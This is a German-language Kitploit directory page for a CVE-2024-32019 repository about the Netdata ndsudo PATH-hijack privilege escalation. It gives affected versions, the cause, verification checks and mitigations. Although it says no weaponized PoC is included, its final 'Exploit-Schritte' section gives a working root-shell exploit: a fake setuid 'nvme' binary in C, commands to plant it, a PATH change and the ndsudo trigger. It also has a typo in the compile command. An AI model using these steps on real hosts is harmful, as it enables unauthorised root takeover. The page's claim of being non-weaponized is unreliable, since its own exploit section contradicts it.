Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2024-32019-PoC — Prüft die Netdata ndsudo SUID PATH Privilegieneskalations-Exposition für CVE-2024-32019 und validiert Patches ohne weaponisierte Ausnutzung. | Kitploit
Tools/GitHubGitHub/ayub0x7/cve-2024-32019-poc
DefensivwerkzeugePrivilege EscalationSchwachstellenanalyseExploitationSicherheitsvirtualisierungPenetrationstests
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Prüft die Netdata ndsudo SUID PATH Privilegieneskalations-Exposition für CVE-2024-32019 und validiert Patches ohne weaponisierte Ausnutzung.

Repository anzeigen
17vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-32019 — Netdata ndsudo Lokale Privilegienausweitung

Zusammenfassung

Netdadas ndsudo-Helfer (installiert als setuid root) schränkt ein, welche Befehle er ausführt, aber löst diese Befehle über den PATH des Aufrufers auf. In betroffenen Versionen kann ein lokaler Benutzer eine bösartige Binärdatei früher im PATH platzieren und ndsudo dazu bringen, sie mit Root-Rechten auszuführen. Behoben in Netdata 1.45.3 und 1.45.0-169.

Betroffen / Behoben

  • Betroffen: >= 1.44.0-60, < 1.45.0-169 und >= 1.45.0, < 1.45.3 (gemäß Upstream-Advisory).

  • Behoben: 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

Auswirkung

Lokale Privilegienausweitung zu Root auf Systemen, auf denen ndsudo mit SUID installiert ist und der Benutzer es aufrufen kann (üblicherweise Mitglieder der Gruppe netdata). NVDGitHub

Ursache (auf hoher Ebene)

  • ndsudo ist SUID-root und führt eine Whitelist von Unterbefehlen wie nvme-list, nvme-smart-log usw.

  • Es ruft externe ausführbare Dateien über ihren Namen auf (z. B. nvme), die über PATH aufgelöst werden, anstatt absolute Pfade oder eine sichere, feste Suche zu verwenden.

  • Wenn ein beschreibbares Verzeichnis vor den Systempfaden erscheint, kann ein Angreifer eine täuschend ähnliche Binärdatei einschleusen, die als Root ausgeführt wird. GitHub

Sichere Reproduktion / Verifikation

Dieses Repository enthält Nicht-Exploit-Prüfwerkzeuge, die:

  • /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (oder wo auch immer installiert) auf SUID/Eigentümerschaft untersuchen.

  • PATH nach beschreibbaren Verzeichnissen durchsuchen, die vor gängigen Systempfaden liegen.

  • Das Vorhandensein von Whitelist-Unterbefehlsnamen bestätigen, die ndsudo auszuführen versuchen könnte.

  • Optional ndsudo --test <subcommand> ausführen, um den aufgelösten Befehl ohne dessen Ausführung auszugeben (mit Vorsicht verwenden, zuerst den Code lesen). GitHub

⚠️ Es ist kein weaponisierter PoC enthalten. Dieses Projekt dient Verteidigern und Forschern dazu, Exposition zu bewerten und Patches verantwortungsvoll zu validieren.

Gegenmaßnahmen

  • Aktualisieren Sie Netdata auf 1.45.3 (stable) oder 1.45.0-169 (nightly).

  • Als Defense-in-Depth-Maßnahme bevorzugen Sie absolute Pfade oder einen bereinigten minimalen PATH in SUID-Helfern; vermeiden Sie unnötigen ndsudo-Zugriff. GitHubwiz.io

Exploit-Schritte

1. Speichern Sie den folgenden C-Code als nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Kompilieren Sie den Exploit
gcc nvme.c - nvme
3. Umgebung einrichten
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Ändern Sie den PATH
export PATH=/tmp/fakebin:$PATH
5. Exploit-Befehl
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Referenzen

  • NVD: CVE-2024-32019. NVD

  • Netdata Advisory (GHSA-pmhq-4cxq-wj93). GitHub

  • Wiz-Zusammenfassung. wiz.io

  • Snyk-Bericht. Vulnerability Guide

  • MITRE/CVE-Eintrag. CVE

Tool herunterladen